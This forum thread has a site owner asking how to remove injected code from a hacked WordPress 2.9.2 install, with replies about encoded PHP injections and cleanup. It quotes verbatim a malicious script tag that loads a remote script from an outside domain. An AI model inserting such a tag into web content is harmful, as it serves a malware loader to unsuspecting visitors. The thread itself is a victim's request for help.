2.9.2 site hacked

clundie: wow… On a site without wordpress?

This script has been placed somewhere in the code that pulls my rss feed and I can’t find it. Help!

<script src=”http://indesignstudioinfo.com/ls.php”></script&gt;

If you try to pull my feed, that’s the error you get (www.thenewpioneersquare.com/feed) and I can’t find the file that the code is in. I’ve fixed all of my other files, but this is nowhere.

Does anyone know where I can find the file to remove this code? I’ve been looking in files for the past 2 hours and have found nothing so far.

Thanks!!!!

from what i read on the other forums chmod-ing the files to non ‘open’ should help.

jkelly11: This file is hidden from an encoded PHP string on all your files.

You can get more info here:
http://sucuri.net/malware/entry/MW:MROBH:1

Thanks @dd — I’ve deleted a lot of that code in the php string (in my case, it infected all of my .php) files, so I don’t understand why I’m still getting the error on my rss feed.

Are you not able to just delete the inserted code and clean it up?

I’m a little nervous to do the whole backup, erase, redo (because of how new I am to wordpress). I was hoping to take care of it by just finding the code.

jkelly11: You probably missed a file or two. Specially inside the themes, wp-includes or plugins. Shoot me an email and I can send an script to automatically do it for you.

@clundie
This is not necessarily specific to WordPress, that’s just one of the more popular apps. The real concern is insecure PHP code, which is more likely to exist in apps that haven’t been properly updated.

If there’s another installation that’s been exploited in the same hosting account, it could affect your other sites, but not across accounts or across customers on the same server.

Our security team can take a look by submitting your information here: http://fwd4.me/Mrd

Alicia

Worked a little bit. Please check the comment I left on your post. Thanks!